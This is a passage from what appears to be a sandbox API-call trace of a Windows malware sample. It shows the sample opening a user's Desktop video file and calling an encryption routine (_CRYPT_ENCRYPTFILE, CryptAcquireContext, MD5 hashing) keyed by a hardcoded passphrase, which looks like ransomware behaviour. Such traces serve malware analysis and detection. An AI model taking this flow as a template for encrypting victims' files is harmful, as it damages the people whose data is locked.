lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0122.120] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0122.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0122.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0122.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0122.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0122.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0122.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0122.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0122.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0122.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0122.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0122.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0122.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0122.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0122.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0122.122] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\bUb qc_SLq8O.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\bub qc_slq8o.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0122.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0122.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea040 [0122.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0122.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0122.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0122.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0122.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0122.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0122.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0122.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0122.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0122.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0122.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0122.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0122.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359a68 [0122.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0122.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0122.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0122.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0122.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0122.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0122.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0122.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0122.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0122.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0122.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0122.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0122.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0122.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0122.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0122.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0122.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0122.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0122.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0122.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0122.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0122.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0122.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0122.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0122.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0122.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0122.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0122.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0122.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0122.154] FreeLibrary (hLibModule=0x772d0000) returned 1 [0122.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0122.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0122.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0122.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0122.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0122.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0122.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0122.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0122.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0122.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0122.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0122.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0122.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0122.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0122.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0122.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0122.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0122.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0122.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0122.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0122.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0122.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0122.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0122.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0122.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0122.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0122.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0122.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0122.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0122.157] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0122.157] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0122.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0122.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0122.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0122.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0122.158] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0122.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0122.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0122.158] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0122.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0122.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0122.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0122.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0122.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0122.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0122.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.158] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0122.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0122.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0122.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0122.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0122.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0122.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0122.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0122.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0122.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0122.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0122.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0122.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0122.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0122.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0122.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0122.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0122.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0122.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0122.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0122.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0122.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392420 | out: hHeap=0x1780000) returned 1 [0122.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0122.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0122.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0122.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0122.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0122.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0122.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0122.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0122.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0122.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359a68 | out: hHeap=0x1780000) returned 1 [0122.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0122.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0122.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0122.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0122.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0122.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0122.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0122.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0122.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0122.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0122.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0122.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0122.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0122.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0122.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0122.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0122.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0122.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0122.160] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9e78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0122.160] CloseHandle (hObject=0x2a0) returned 1 [0122.161] FreeLibrary (hLibModule=0x772d0000) returned 1 [0122.161] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0122.161] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\bUb qc_SLq8O.mp4", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a228cf0, ftCreationTime.dwHighDateTime=0x1d5e716, ftLastAccessTime.dwLowDateTime=0x27856890, ftLastAccessTime.dwHighDateTime=0x1d5e7e1, ftLastWriteTime.dwLowDateTime=0x27856890, ftLastWriteTime.dwHighDateTime=0x1d5e7e1, nFileSizeHigh=0x0, nFileSizeLow=0x5c27, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="bUb qc_SLq8O.mp4", cAlternateFileName="BUBQC_~1.MP4")) returned 0x41ac500 [0122.161] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0122.161] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0122.161] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.161] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0122.161] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.161] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0122.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797048, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0122.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0122.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797088, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0122.162] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0122.162] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0122.162] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0122.162] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0122.162] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0122.163] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.163] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0122.163] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.163] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0122.163] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0122.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43caa18, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0122.163] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0122.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0122.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 